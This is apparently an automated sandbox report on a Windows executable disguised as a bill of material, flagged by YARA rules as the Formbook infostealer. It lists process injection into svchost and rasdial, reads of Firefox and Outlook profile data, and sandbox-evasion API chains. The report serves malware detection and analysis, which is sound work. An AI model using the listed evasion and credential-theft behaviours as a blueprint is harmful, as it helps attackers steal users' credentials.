            Source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2188676129.000000000401D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Copy of 01. Bill of Material - 705.exe
            Source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2176531629.0000000003E23000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Copy of 01. Bill of Material - 705.exe
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4642142846.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4651757327.00000000044D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2525577951.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2527501783.0000000006980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4654251110.00000000056E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4651596001.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4651797494.0000000002EF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2526291195.0000000003C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@15/14
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A37B5 GetLastError,FormatMessageW,0_2_003A37B5
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003910BF AdjustTokenPrivileges,CloseHandle,0_2_003910BF
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003916C3
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003A51CD
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_003BA67C
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003A648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_003A648E
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_003342A2
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeFile created: C:\Users\user\AppData\Local\Temp\aut40FF.tmpJump to behavior
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rasdial.exe, 00000006.00000002.4642916283.0000000002B02000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2710629422.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4642916283.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2712941703.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2710477193.0000000002AB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Copy of 01. Bill of Material - 705.exeReversingLabs: Detection: 39%
            Source: Copy of 01. Bill of Material - 705.exeVirustotal: Detection: 29%
            Source: unknownProcess created: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exe"Jump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Copy of 01. Bill of Material - 705.exeStatic file information: File size 1247232 > 1048576
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: GQXHQykfhUHHi.exe, 00000004.00000002.4644705252.0000000000DAE000.00000002.00000001.01000000.00000005.sdmp, GQXHQykfhUHHi.exe, 00000007.00000002.4642079066.0000000000DAE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2177667047.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2176659408.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430910122.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433064338.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2525931476.00000000043D1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2528100736.0000000004583000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.0000000004730000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000003.2494792485.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525760101.0000000003200000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000002.4647734921.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000003.2469658209.00000000011BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2177667047.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, Copy of 01. Bill of Material - 705.exe, 00000000.00000003.2176659408.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2430910122.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525920699.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2433064338.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000006.00000002.4652162130.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2525931476.00000000043D1000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.2528100736.0000000004583000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4652162130.0000000004730000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000003.2494792485.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2525760101.0000000003200000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000002.4647734921.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000004.00000003.2469658209.00000000011BB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rasdial.exe, 00000006.00000002.4642916283.0000000002A59000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4653099996.0000000004D5C000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593226561.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2819411569.0000000023A9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rasdial.exe, 00000006.00000002.4642916283.0000000002A59000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.4653099996.0000000004D5C000.00000004.10000000.00040000.00000000.sdmp, GQXHQykfhUHHi.exe, 00000007.00000000.2593226561.00000000032AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2819411569.0000000023A9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Copy of 01. Bill of Material - 705.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003342DE
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_00350A76 push ecx; ret 0_2_00350A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414833 push ss; retf 2_2_00414842
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041389F push FFFFFFA4h; ret 2_2_004138AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00412100 push edi; iretd 2_2_00412101
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403110 push eax; ret 2_2_00403112
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A987 push ebp; ret 2_2_0040A99B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417CE3 push eax; ret 2_2_00417CE4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00413FF7 push ss; retf 2_2_0041403C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417FAD push esp; iretd 2_2_00417FB3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380225F pushad ; ret 2_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038027FA pushad ; ret 2_2_038027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx2_2_038309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380283D push eax; iretd 2_2_03802858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03801368 push eax; iretd 2_2_03801369
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047327FA pushad ; ret 6_2_047327F9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0473225F pushad ; ret 6_2_047327F9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0473283D push eax; iretd 6_2_04732858
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_047609AD push ecx; mov dword ptr [esp], ecx6_2_047609B6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0081078C push FFFFFFA4h; ret 6_2_0081079A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_00814BD0 push eax; ret 6_2_00814BD1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_00814E9A push esp; iretd 6_2_00814EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0080EFED push edi; iretd 6_2_0080EFEE
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_008212B6 pushad ; ret 6_2_008212F3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_00811720 push ss; retf 6_2_0081172F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0080787F push ebp; ret 6_2_00807888
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_00819BBE push ss; ret 6_2_00819C63
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_045C2760 push edx; retf 6_2_045C2761
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_045D5072 push eax; ret 6_2_045D5074
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_045C5104 push esp; retf 6_2_045C5106
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_045C51DC push es; retf 6_2_045C51E3
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_045C53B2 push FFFFFFACh; ret 6_2_045C53EF
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeFile created: \copy of 01. bill of material - 705.exe
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeFile created: \copy of 01. bill of material - 705.exeJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_0034F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0034F98E
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeCode function: 0_2_003C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_003C1C41
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97567
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeAPI/Special instruction interceptor: Address: 1383214
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\rasdial.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
            Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 4338Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeWindow / User API: threadDelayed 5635Jump to behavior
            Source: C:\Users\user\Desktop\Copy of 01. Bill of Material - 705.exeAPI coverage: 3.9 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rasdial.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\rasdial.exe TID: 4392Thread sleep count: 4338 > 30Jump to behavior
